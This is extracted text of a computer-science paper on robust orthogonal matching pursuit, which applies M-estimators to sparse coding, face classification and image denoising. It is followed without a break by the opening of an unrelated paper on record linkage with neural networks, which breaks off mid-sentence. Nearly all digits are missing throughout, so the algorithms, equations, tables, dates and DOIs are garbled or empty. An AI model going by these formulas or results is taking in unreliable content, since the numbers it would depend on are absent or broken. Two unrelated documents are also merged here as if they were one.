e( )←y− β( ) : mad←median|e( )[i]− ẽ( )| : s( )← . ×mad : w( )[i]←wc ( e( )[i] s( ) ) i= , ,...,m f initial weight vector : w( )←diag ( w( ) ) : t ← : while no convergence do : β(t)←( t w(t− ) )− t w(t− )y fblock coordinate descent : e(t)←y− β(t) : mad←median|e(t)[i]− ẽ(t)| : s(t)← . ×mad : w(t)[i]←wc ( e(t)[i] s(t) ) i= , ,...,m fblock coordinate descent : w(t)←diag ( w(t) ) : t ← t+ : return β̂m–est←β(t) ŵm–est←w(t) ffinal estimates each robomp alternative according to its underlaying m–estimator; for instance, fair– estimator–based–omp is simply referred to as fair. as with omp, the only hyperparameter is the stopping criterion: either k as the maximum number of iterations (i.e., sparseness of the solution), or �, defined as a threshold on the error norm. for completeness, algorithm details the robomp routine for the case of set maximum number of iterations (the case involving � is straightforward). three major differences are noted with respect to omp: . the robust m–estimator–based update stage of the active set is performed via irls, . the updated residuals are computed considering the weight vector ŵk from irls, and . the weight vector constitutes an additional output of robomp. the last two differences are key for convergence and interpretability, respectively. the former guarantees shrinkage of the weighted error in its first and second moments, while the latter provides an intuitive, bounded, m–dimensional vector capable of discriminating between samples from the main mode and potential outliers at the tails of the density. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm robomp : function robomp(y∈irm,d∈irm×n,wc(u),k) : k← f initializations : r ←y : ←∅ : while k <k do : λk =argmaxi∈�|〈rk− ,di〉| �={ , ,···,n} : k = k− ∪{λk} : =[d k[ ],d k[ ],···,d k[k]] : {β̂m–est,ŵk}←irls(y, ,wc(u)) frobust linear fit : xk[ k[i]]← β̂m–est[i] i= , ,...,k fupdate active set : rk[i]←ŵk[i]×(y[i]−(dxk)[i]) i= , ,...,m fupdate residual : k←k+ : return xrobomp←xk,w←ŵk ffinal estimates results this section evaluates the performance of the proposed methods in three different settings. first, sparse coding on synthetic data is evaluated under different noise scenarios. then, we present an image recognition framework fully–based on sparse decompositions using a well known digital image database. lastly, a denoising mechanism that exploits local sparse coding highlights the potential of the proposed techniques. sparse coding with synthetic data the dictionary or observation matrix, d∈ir × , is generated with independent entries drawn from a zero–mean gaussian random variable with variance equal to one. the ideal sparse code, x ∈ ir , is generated by randomly selecting ten entries and assigning them independent samples from a zero–mean, unit–variance gaussian distribution. the rest of the components are set equal to zero, i.e., k = . the resulting observation vector y∈ ir is computed as the linear combination of the dictionary with weights from the ideal sparse code plus a noise component n∈ir : y=dx +n. ( ) the first set of experiments considers different noise distributions. in particular, five noise cases are analyzed: gaussian (n( , )), laplacian with variance equal to , student’s t–distribution with degrees of freedom, chi–squared noise with degree of freedom, and exponential with parameter λ= . then, omp, gomp, cmp, and the variants of robomp estimate the sparse code with parameter k = . for the active set update stage of cmp and robomp, the maximum allowed number of hq/irls iterations is set to . for gomp, n ∈{ , , , } where the best results are presented. the performance measure is defined as the normalized ` –norm of the difference between the ground truth sparse code, x , and its estimate. the average results for independent runs are summarized in table . as expected, most of the algorithms loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average norm of sparse code errors of mse–based omps and robust alternatives for different types of noise. best results are marked bold. k =k = . noise gaussian laplacian student chi–squared exponential omp . . . . . gomp . . . . . cmp . . . . . cauchy . . . . . fair . . . . . huber . . . . . tukey . . . . . welsch . . . . . perform similar under gaussian noise, which highlights the adaptive nature of cmp and robomp. for the non–gaussian cases, cmp and tukey are major improvements over ordinary omp. the rest of the robomp flavors consistently outperform the state of the art omp and gomp techniques. this confirms the optimality of mse–based greedy sparse decompositions when the errors are normally distributed; yet, they degrade their performance when such assumption is violated. the second set of results deals with non–linear additive noise or instance–based degradation. once again, d and x are generated following the same procedure of the previous set of results (k = ). yet now, noise is introduced by means of zeroing randomly selected entries in y. the number of missing samples is modulated by a rate parameter ranging from to . . figure summarizes the average results for k = and independent runs. as expected, the performance degrades when the rate of missing entries increases. however, the five variants of robomp are consistently superior than omp and gomp until the . –mark. beyond that point, some variants degrade at a faster rate. also, cmp achieves small sparse code error norms for low missing entries rate; however, beyond the . –mark, cmp seems to perform worse than omp and even gomp. this experiment highlights the superiority of robomp over mse–based and correntropy–based methods. now, the effect of the hyperparameter k is studied. once again, independent runs are averaged to estimate the performance measure. the rate of missing entries is fixed to . while k is the free variable. figure shows how the average error norm is a non–increasing function of k for the non–mse–based variants of omp (slight deviation in some cases beyond k = might be due to estimation uncertainty and restricted sample size). on the other hand, both omp and gomp seem to stabilize after a certain number of iterations, resulting in redundant runs of the algorithm. these outcomes imply that robomp is not only a robust sparse code estimator, but also a statistically efficient one that exploits the available information in the data in a principled manner. it is also worth noting that cmp underperforms when compared to most flavors of robomp. impulsive noise is the other extreme of instance–based contamination. namely, a rate of entries in y are affected by aggressive high–variance noise while the rest of the elements are left intact. the average performance measure of independent runs is reported for loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . rate of missing entries . . . n o rm o f s p a rs e c o d e e rr o r omp gomp cmp cauchy fair huber tukey welsch figure average normalized norm of sparse code error of mse–based omps and robust alternatives for several rates of missing entries in the observation vector. all algorithms use the ground truth sparsity parameter k =k = . full-size doi: . /peerjcs. /fig- k . . . n o rm o f s p a rs e c o d e e rr o r omp gomp cmp cauchy fair huber tukey welsch figure average normalized norm of sparse code error of mse–based omps and robust alternatives over k (number of iterations) for a . rate of missing entries in the observation vector. k = . full-size doi: . /peerjcs. /fig- k =k = . figure a details the results for varying rates of entries affected by − db impulsive noise. again, robomp and cmp outperform omp and gomp throughout the entire experiment. tukey and welsch seem to handle this type of noise more effectively; specifically, the error associated to the algorithms in question seem to be logarithmic or radical for omp and gomp, linear for fair, cauchy, huber and cmp, and polynomial for tukey and welsch with respect to the percentage of noisy samples. on the other hand, figure b reflects the result of fixing the rate of affected entries to . and modulating the variance of the impulsive noise in the range [− , ]. robomp and cmp again outperform mse–based methods (effect visually diminished due to log–transform of the performance measure for plotting purposes). for this case, cmp is only superior to the fair version of robomp. in summary, the experiments concerning sparse coding with synthetic data confirm the robustness of the proposed robomp algorithms. non–gaussian errors, missing samples loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average normalized norm of sparse code error of mse–based omps and robust alternatives for cases involving impulsive noise in the observation vector. (a) performance measure for several rates of noisy entries (− db) in the observation vector. (b) log–performance measure for several noise levels in the observation vector (fixed . rate). all algorithms use the ground truth sparsity parameter k =k = . full-size doi: . /peerjcs. /fig- and impulsive noise are handled in a principled scheme by all the robomp variants and, for most cases, the results outperform the correntropy–based cmp. tukey seems to be the more robust alternative that is able to deal with a wide spectrum of outliers in a consistent, efficient manner. robomp–based classifier we introduce a novel robust variant for sparse representation–based classifiers (src) fully based on robomp. let ai=[ai ,a i ,...,a i ni]∈ir m×ni be a matrix with ni examples from the ith class for i= , ,...,n . then, denote the set n={ , ,...,n} and the dictionary matrix of all training samples a=[a ,a ,...,an]∈ irm×n where n= ∑n i= ni is the number of training examples from all n classes. lastly, for each class i, the characteristic function δi :irn→irn extracts the coefficients associated with the ith label. the goal of the proposed classifier is to assign a class to a test sample y∈irm given the generative ‘‘labeled’’ dictionary a. the classification scheme proceeds as follows: n different sparse codes are estimated via algorithm given the subdictionaries ai for i= , ,...,n . the class–dependent residuals, ri(y) are computed and the test example is assigned to the class with minimal residual norm. to avoid biased solutions based on the scale of the data, the columns of a are set to have unit–` –norm. the result is a robust sparse representation–based classifier or rsrc, which is detailed in algorithm . similar algorithms can be deployed for omp, gomp and cmp (wang, tang & li, ). in particular, the original src (wright et al., ) exploits a ` –minimization approach to the sparse coding problem; however the fidelity term is still mse, which is sensitive to outliers. in this section we opt for greedy approaches to estimate the sparse representation. moreover for robomp, the major difference is the computation of the residual—we utilize the weight vector to downplay the influence of potential outlier components and, hence, reduce the norm of the errors under the proper dictionary. cmp utilizes a similar approach, but the weight matrix is further modified due to the hq implementation (see wang, tang & li ( ) for details). we compare the src variants under two different types of noise on the extended yale b database. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm rsrc inputs: normalized matrix of training samples a=[a ,a ,...,an]∈irm×n test example, y∈irm m–estimator weight function, wc(u) stopping criterion for robomp, k output: class(y) : (xrobomp,w)←robomp(y,a,wc(u),k) fcompute robust sparse code and weight vector : ri(y)=||diag(w)(y−aiδi(xrobomp))|| , i∈n fcalculate norm of class–dependent residuals : class(y)←argmini∈n r i(y) fpredict label extended yale b database this dataset contains over , facial images of subjects under different lighting settings (lee, ho & kriegman, ). for each subject, a maximum of frontal– face images are provided alongside light source angles. the original dimensionality of the images is × or , in vector form. the database can be found at http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html. due to the difference in lighting conditions, the database is usually segmented into subsets (wright et al., ). let θ= √ a +e where a and e are the azimuth and elevation angles of the single light source, respectively. the first subset comprises the interval ≤θ ≤ , the second one, ≤θ ≤ , the third one, ≤θ ≤ , the fourth one, ≤θ ≤ , and lastly, the fifth subset includes images with θ ≥ . in this way, the subsets increase in complexity and variability, making the classifier job more challenging, e.g., subset one includes the cleanest possible examples, while the fifth dataset presents aggressive occlusions in the form of shadows. the cardinality of the five subsets are (per subject): , , , , and images. for all the following experiments, the dictionary matrix a is built from the samples corresponding to subsets and , while the test examples belong to the third subset. this latter collection is further affected by two kinds of non–linearly additive noise. occlusions and missing pixels two different types of noise are simulated: blocks of salt and pepper noise, i.e., occlusions, and random missing pixels. in all the following experiments, the sparsity parameter for learning the sparse code is set to k = (for gomp, n ∈{ , } and the best results are presented). also, different independent runs are simulated for each noise scenario. for the occlusion blocks, a rate of affected pixels is selected beforehand in the range [ , . ]. then, as in the original src (wright et al., ), we downsampled the inputs mainly for computational reasons. in particular, we utilized factors of / , / , / , and / resulting in feature dimensions of , , , and , respectively. next, every test example is affected by blocks of salt and pepper noise (random pixels set to either or ). the location of the block is random and its size is determined by the rate parameter. every sample is assigned a label according to src variants based on omp and gomp, cmp–based classifier (coined as cmpc by wang, tang & li ( )), and our proposed loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html http://dx.doi.org/ . /peerj-cs. . . . . . oclussion rate . . . . c la ss ifi ca tio n a cc u ra cy omp gomp cmp cauchy fair huber tukey welsch figure average classification accuracy on the extended yale b database over occlusion rate of blocks of salt and pepper noise. feature dimension= . k = . full-size doi: . /peerjcs. /fig- rsrc. for simplicity, we use the same terminology as before when it comes to the different classifiers. the performance metric is the average classification accuracy in the range [ , ]. figure highlights the superiority of rsrc over omp and gomp. particularly, huber, tukey and welsch are consistently better than cmp while fair and cauchy seem to plateau after the . –mark. next, the effects of the feature dimension and the sparsity parameter are investigated. figure confirms the robustness of the proposed discriminative framework. as expected, when the feature dimension increases, the classification accuracy increases accordingly. however, the baselines set by omp and gomp are extremely low for some cases. on the other hand, cmp and rsrc outperform both mse–based approaches, and even more, the novel m–estimator–based classifiers surpass their correntropy–based counterpart. when it comes to the sparsity parameter, k , it is remarkable how omp and gomp do not improve their measures after the first iteration. this is expected due to the lack of principled schemes to deal with outliers. in contrast, rscr shows a non–decreasing relation between classification accuracy and k , which implies progressive refinement of the sparse code over iterations. to make these last two findings more evident, table illustrates the classification accuracy for a very extreme case: . rate of occlusion and feature dimension equal to , i.e., each input image is roughly × pixels in size (the downsampling operator introduces rounding errors in the final dimensionality). this scenario is very challenging and, yet, most of rsrc variants achieve stability and high classification after only four iterations. on the other hand, omp and gomp degrade their performance over iterations. this confirms the robust and sparse nature of the proposed framework. for the missing pixels case, a rate of affected pixels is selected beforehand in the range [ , ]. then, every test example is affected by randomly selected missing pixels—the chosen elements are replaced by samples drawn from a uniform distribution over the range [ ,ymax]where ymax is the largest possible intensity of the image in question. figures and summarize similar experiments as in the occlusion case. again, the rsrc are superior than mse–based methods and consistently increase the performance measure as the sparsity loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average classification accuracy on the extended yale b database for two cases concerning blocks of salt and pepper noise at a fixed rate of . . (a) classification accuracy over feature dimension. k = . (b) classification accuracy over sparsity parameter. feature dimension= , . full-size doi: . /peerjcs. /fig- table average classification accuracy on the extended yale b database over k for a fixed rate of . pixels affected by blocks of salt and pepper noise. best result for each classifier is marked bold. feature dimension = . k omp gomp cmp cauchy fair huber tukey welsch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . parameter grows. the extreme case here involves a rate of . affected pixels by distorted inputs and a feature dimension of . table reinforces the notion that robust methods achieve higher classification accuracy even in challenging scenarios. lastly, it is worth noting that cmp performs better in the missing pixels case; yet, it fails to surpass the welsch variant of rsrc which is its equivalent in terms of weight function of errors. once again, tukey is the algorithm with overall best results that is able to handle both kinds of noise distributions in a more principled manner. image denoising via robust, sparse and redundant representations the last set of results introduces a preliminary analysis of image denoising exploiting sparse and redundant representations over overcomplete dictionaries. the approach is based on the seminal paper by elad & aharon ( ). essentially, zero–mean white and homogeneous gaussian additive noise with variance σ is removed from a given image via sparse modeling. a global image prior that imposes sparsity over patches in every location of the image simplifies the sparse modeling framework and facilitates its implementation via parallel processing. in particular, if the unknown image z can be devised as the spatial (and possibly overlapping) superposition of patches that can be effectively sparsely represented given a dictionary d, then, the optimal sparse code, x̂ij, and estimated denoised image, ẑ, loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . . . . . . . rate of missing pixels . . . . c la ss ifi ca tio n a cc u ra cy omp gomp cmp cauchy fair huber tukey welsch figure average classification accuracy on the extended yale b database over missing pixels rate. feature dimension= , . k = . full-size doi: . /peerjcs. /fig- figure average classification accuracy on the extended yale b database for two cases concerning missing pixels at a fixed rate of . . (a) classification accuracy over feature dimension. k = . (b) classi- fication accuracy over sparsity parameter. feature dimension= , . full-size doi: . /peerjcs. /fig- are equal to: {x̂ij,ẑ}=argmin xij,z λ||z−y|| + ∑ ij µij||xij|| + ∑ ij ||dxij−rijz|| ( ) where the first term is the log–likelihood component that enforces close resemblance (or proximity in an ` sense) between the measured noisy image, y, and its denoised (and unknown) counterpart z. the second and third terms are image priors that enforce that every patch, zij =rijz, of size √ n× √ n in every location of the constructed image z has a sparse representation with bounded error. λ and µij are regularization parameters than can easily be reformulated as constraints. block coordinate descent is exploited to solve eq. ( ). in particular, x̂ij is estimated via greedy approximations of the sparse code of each local block or patch. the authors suggest omp with stopping criterion set by ||dxij −rijz|| ≤ (cσ) for all {ij} combinations (sequential sweep of the image to extract all possible √ n× √ n blocks). then, the estimated denoised image has the following closed form solution: ẑ= ( λi+ ∑ ij rtij rij )− ( λy+ ∑ ij rtij dxij ) ( ) loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table average classification accuracy on the extended yale b database over k for a fixed rate of . missing pixels. best result for each classifier is marked bold. feature dimension= . k omp gomp cmp cauchy fair huber tukey welsch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . where i is the identity matrix. the authors go one step further and propose learning the dictionary, d, as well; this is accomplished either from a corpus of high–quality images or the corrupted image itself. the latter alternative results in a fully generative sparse modeling scheme. for more details regarding the denoising mechanisms, refer to elad & aharon ( ). for our case, we focus on the sparse coding subproblem alone and utilize an overcomplete discrete cosine transform (dct) dictionary, d∈ir × , and overlapping blocks of size × . the rest of the free parameters are set according to the heuristics presented in the original work: λ= /σ and c = . . our major contribution is the robust estimation of the sparse codes via robomp in order to handle potential outliers in a principled manner. two types of zero–mean, homogeneous, additive noise (gaussian and laplacian) are simulated with different variance levels on independent runs. each run comprises of separate contaminations of well known images (lena, barbara, boats and house) followed by the different denoising frameworks, each one based on a distinct variant of omp. as before, every algorithm is referred to as the estimator exploited in the active set update stage. tables and summarize the average performance measures (psnr in db) for different variance levels of each noise distribution. as expected, omp is roughly the best denoising framework for additive gaussian noise. however, in the laplacian case, cauchy achieves higher psnr levels throughout the entire experiment. this suggests the cauchy m–estimator is more suitable for this type of non–gaussian environment. it is worth noting though that the averaging performed in eq. ( ) could easily blur the impact of the sparse code solvers for this particular joint optimization. also, no attempt was made to search over the hyperparameter space of λ and c, which we suspect have different empirical optima depending on the noise distribution and sparse code estimator. these results are simply preliminary and highlight the potential of robust denoising frameworks based on sparse and redundant representations. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table grand average psnr (db) of estimated denoised images under zero-mean additive gaussian noise exploiting patch-based sparse and redundant representations. σ omp gomp cmp cauchy fair huber tukey welsch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . table grand average psnr (db) of estimated denoised images under zero-mean additive laplacian noise exploiting patch-based sparse and redundant representations. σ omp gomp cmp cauchy fair huber tukey welsch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . discussion an example is considered a univariate outlier if it deviates from the rest of the distribution for a particular variable or component (andersen, ). a multivariate outlier extends this definition to more than one dimension. however, a regression outlier is a very distinctive type of outlier—it is a point that deviates from the linear relation followed by most of the data given a set of predictors or explanatory variables. in this regard, the current work focuses on regression outliers alone. the active set update stage of omp explicitly models the interactions between the observation vector and the active atoms of the dictionary as purely linear. this relation is the main rationale behind robomp: regression outliers can be detected and weighted when m–estimators replace the pervasive ols solver. if the inference process in sparse modeling incorporates higher–order interactions (as in vincent & bengio ( )), linear regression outliers become meaningless and other techniques are needed to downplay their influence. the relation between outliers in the observation vector and regression outliers is highly complex due to the mixing of sources during the generative step and demands for further research. even though other omp variants are utilized in practice for different purposes, e.g., gomp, romp and cosamp, we decided to disregard the last two flavors mainly due to three factors: space limitations, inherent mse cost functions, and most importantly, they both have been outperformed by cmp in similar experiments as the ones simulated here (wang, tang & li, ). the algorithm to beat was cmp due to its resemblance to an m–estimator–based omp. we believe we have provided sufficient evidence to deem robomp (and specifically the tukey variant) as superior than cmp in a wide variety of tasks, performance measures and datasets. in this regard, it is worth noting that cmp reduces to the welsch algorithm with the ` –norm of the errors as the estimated scale loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. parameter (s=||e|| ), and hyperparameter c = √ m. the main drawback of such heuristic is the use of a non–robust estimator of the scale, which in turn, will bias the sparse code. the cmp authors introduce a data–dependent parameter of the exponential weight function (gaussian kernel of correntropy) that relies on the dimensionality of the input, m. the rationale behind such add–hoc choice is not fully justified, while in contrast, we provide statistically sound arguments for our choice of the weight function hyperparameter, i.e., % asymptotic efficiency on the standard normal distribution. we believe this is the underlying reason behind the superiority of welsch over cmp on most of the synthetic data experiments and the entirety of the simulations on the extended yale b database. m–estimators are not the only alternative to robust linear regression. s–estimators (rousseeuw & yohai, ) are based on the residual scale of m–estimators. namely, s– estimation exploits the residual standard deviation of the errors to overcome the weakness of the re–scaled mad. another option is the so–called mm–estimators (yohai, ) which fuse s–estimation and m–estimation to achieve high breakdown points (bdp) and better efficiency. optimization for both s–estimators and mm–estimators is usually performed via irls. another common approach is the least median of squares method (rousseeuw, ) where the optimal parameters solve a non–linear minimization problem involving the median of squared residuals. advantages include robustness to false matches and outliers, while the main drawback is the need for monte carlo sampling techniques to solve the optimization. these three approaches are left for potential further work in order to analyze and compare performances of several types of robust estimators applied to sparse coding. in terms of image denoising via robust, sparse and redundant representations, future work will involve the use of the weight vector in the block coordinate descent minimization in order to mitigate the effect of outliers. if sparse modeling is the final goal, k–svd (aharon, elad & bruckstein, ) is usually the preferred dictionary learning algorithm. however, in the presence of non–gaussian additive noise, the estimated dictionary might be biased as well due to the explicit mse cost function of the sequential estimation of generative atoms. plausible alternatives include correntropy–based cost functions (loza & principe, ) and ` –norm fidelity terms (loza, ). in the spirit of openness and to encourage reproducibility, the matlab (mathworks) and python code corresponding to all the proposed methods and experiments of this paper are freely available at https://github.com/carlosloza/robomp. conclusion we investigated the prospect of m–estimation applied to sparse coding as an alternative to ls–based estimation and found that our hypothesis of exploiting m–estimators for better robustness is indeed valid. unlike the original orthogonal matching pursuit, our framework is able to handle outliers and non–gaussian errors in a principled manner. in addition, we introduce a novel robust sparse representation–based classifier that outperform current state of the art and similar robust variants. preliminary results on image denoising confirm the plausibility of the methods and open the door to future applications where robustness loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/carlosloza/robomp http://dx.doi.org/ . /peerj-cs. and sparseness are advantageous. the proposed five algorithms do not require parameter tuning from the user and, hence, constitute a suitable alternative to ordinary omp. acknowledgements the author would like to thank the editor and anonymous reviewers for their constructive comments. additional information and declarations funding this work was supported by universidad san francisco de quito (poligrant no. ) the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: universidad san francisco de quito (poligrant no. ). competing interests the authors declare there are no competing interests. author contributions • carlos a. loza conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/carlosloza/robomp data (extended yale b database) is available at: http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html. references aharon m, elad m, bruckstein a. . k-svd: an algorithm for designing overcom- plete dictionaries for sparse representation. ieee transactions on signal processing ( ): – doi . /tsp. . . andersen r. . modern methods for robust regression. vol. . thousand oaks: sage. chen ss, donoho dl, saunders ma. . atomic decomposition by basis pursuit. siam review ( ): – doi . /s x. donoho dl, elad m, temlyakov vn. . stable recovery of sparse overcomplete representations in the presence of noise. ieee transactions on information theory ( ): – doi . /tit. . . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/carlosloza/robomp http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /s x http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /peerj-cs. elad m, aharon m. . image denoising via sparse and redundant representations over learned dictionaries. ieee transactions on image processing ( ): – doi . /tip. . . elad m, figueiredo ma, ma y. . on the role of sparse and redundant rep- resentations in image processing. proceedings of the ieee ( ): – doi . /jproc. . . geman d, yang c. . nonlinear image recovery with half-quadratic regularization. ieee transactions on image processing ( ): – doi . / . . hogg rv. . statistical robustness: one view of its use in applications today. the american statistician ( ): – doi . / . huber pj. . robust statistics. in: international encyclopedia of statistical science. berlin: springer, – . lee k-c, ho j, kriegman dj. . acquiring linear subspaces for face recognition under variable lighting. ieee transactions on pattern analysis & machine intelligence ( ): – . liu w, pokharel pp, príncipe jc. . correntropy: properties and applications in non-gaussian signal processing. ieee transactions on signal processing ( ): – doi . /tsp. . . loza ca. . robust k-svd: a novel approach for dictionary learning. in: interna- tional workshop on artificial intelligence and pattern recognition. new york: springer, – . loza ca, principe jc. . a robust maximum correntropy criterion for dictionary learning. in: machine learning for signal processing (mlsp), ieee th international workshop on. piscataway: ieee, – . mallat s. . a wavelet tour of signal processing: the sparse way. orlando: academic press. mallat s, zhang z. . matching pursuit with time-frequency dictionaries. tech- nical report. courant institute of mathematical sciences new york united states ( ): – doi . / . . needell d, tropp ja. . cosamp: iterative signal recovery from incomplete and inaccurate samples. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . needell d, vershynin r. . signal recovery from incomplete and inaccurate measure- ments via regularized orthogonal matching pursuit. ieee journal of selected topics in signal processing ( ): – doi . /jstsp. . . nikolova m, ng mk. . analysis of half-quadratic minimization methods for signal and image recovery. siam journal on scientific computing ( ): – doi . / . olshausen ba, field dj. . emergence of simple-cell receptive field proper- ties by learning a sparse code for natural images. nature ( ): – doi . / a . rousseeuw p, yohai v. . robust regression by means of s-estimators. in: robust and nonlinear time series analysis. new york: springer, – . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /jstsp. . http://dx.doi.org/ . / http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. rousseeuw pj. . least median of squares regression. journal of the american statistical association ( ): – doi . / . . . tibshirani r. . regression shrinkage and selection via the lasso. journal of the royal statistical society. series b (methodological) ( ): – doi . /tit. . . tropp ja, gilbert ac. . signal recovery from random measurements via orthogonal matching pursuit. ieee transactions on information theory ( ): – doi . /tit. . . vincent p, bengio y. . kernel matching pursuit. machine learning ( – ): – doi . /a: . wang j, kwon s, shim b. . generalized orthogonal matching pursuit. ieee transactions on signal processing ( ): – doi . /tsp. . . wang y, tang yy, li l. . correntropy matching pursuit with application to robust digit and face recognition. ieee transactions on cybernetics ( ): – doi . /tcyb. . . wright j, yang ay, ganesh a, sastry ss, ma y. . robust face recognition via sparse representation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . xu y, zhang d, yang j, yang j-y. . a two-phase test sample sparse representation method for use with face recognition. ieee transactions on circuits and systems for video technology ( ): – doi . /tcsvt. . . yohai vj. . high breakdown-point and high efficiency robust estimates for regres- sion. the annals of statistics ( ): – . zhang z. . parameter estimation techniques: a tutorial with application to conic fit- ting. image and vision computing ( ): – doi . /s - ( ) - . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tcsvt. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. submitted august accepted january published february corresponding author antonio maratea, antonio.maratea@uniparthenope.it academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright maratea et al. distributed under creative commons cc-by . open access record linkage of banks and municipalities through multiple criteria and neural networks antonio maratea, angelo ciaramella and giuseppe pio cianci department of science and technology, university of naples ‘‘parthenope’’, naples, italy abstract record linkage aims to identify records from multiple data sources that refer to the same entity of the real world. it is a well known data quality process studied since the second half of the last century, with an established pipeline and a rich literature of case studies mainly covering census, administrative or health domains. in this paper, a method to recognize matching records from real municipalities and banks through multiple similarity criteria and a neural network classifier is proposed: starting from a labeled subset of the available data, first several similarity measures are combined and weighted to build a feature vector, then a multi-layer perceptron (mlp) network is trained and tested to find matching pairs. for validation, seven real datasets have been used (three from banks and four from municipalities), purposely chosen in the same geographical area to increase the probability of matches. the training only involved two municipalities, while testing involved all sources (municipalities vs. municipalities, banks vs banks and and municipalities vs. banks). the proposed method scored remarkable results in terms of both precision and recall, clearly outperforming threshold-based competitors. subjects artificial intelligence, data science, databases keywords record linkage, entity resolution, neural networks, feature extraction, deduplication introduction record linkage (rl from now on, also called entity resolution or entity matching), is the process of identifying records coming from different sources that refer to the same real-world entity. similarly, record deduplication (rd from now on) is the process of identifying duplicate records, where the same entity of the real word has been entered multiple times in the same database. the main difference between rl and rd is that records coming from different sources may lack a common identifier and schema (please refer to christen ( ) and zhang ( ) for a general discussion of related issues). the pairing of records or the identification of duplicates is a statistically challenging and computationally demanding problem: scarce data quality control results in errors, noise, missing values, omissions, ambiguities and even lies in the data, that combined with the differences in database schemas and regional conventions when the number of nationalities grows, results in a daunting number of factors to be considered. the brute- force comparison all versus all (ava) of the records from different sources to discover occasional matches is unfeasible even for a modest volume of data. notwithstanding these how to cite this article maratea a, ciaramella a, cianci gp. . record linkage of banks and municipalities through multiple criteria and neural networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:antonio.maratea@uniparthenope.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. difficulties, rl is known and has been treated since the second half of the last century, with a rich literature in different domains (surveys in the context of data warehousing and for different phases can be found in brizan & tansel ( ) and christen ( )) and an established implementation process (see ‘phases of rl’). while data quality is related to and borrows techniques from rl and rd, it acts as an a priori filter, trying to prevent the insurgence of duplicate records with a proper control process before the data consolidation. rl and rd, on the contrary, act as a posteriori filters, trying to detect duplicate records and clean the data after consolidation. to the data analyst, they represent a required pre-processing step when it is legitimate to assume that the data to be analyzed are corrupted by consequence of a scarce quality control during acquisition, or come from heterogeneous sources with respect to time, place or context (please refer to batini & scannapieco ( ) for a general discussion of related issues). the traditional approach to rl and rd is probabilistic, or rule-based, and only relatively recently machine learning alternatives have emerged (see zhao & ram ( )). the probabilistic approach is grounded on the estimation of probabilities of match and on thresholds for the similarity scores; the rule-based approach tries to explicitly model the knowledge of domain experts; the machine learning approach, on the contrary, relies only on data and can be cost-sensitive, supervised, unsupervised, or semi-supervised. in the following a multiple-criteria feature vector and a supervised classifier are proposed in the classification phase of the rl process, outperforming classic crude threshold-based methods and producing remarkable results. the paper is organized as follows: in ‘background’ the phases of a traditional rl process and the related literature on neural networks are sketched; in ‘materials and methods’ the proposed method is presented in detail; in ‘experiments’ the used data and the experiments are fully described; finally, in ‘conclusions’, main conclusions are drawn. background first the currently 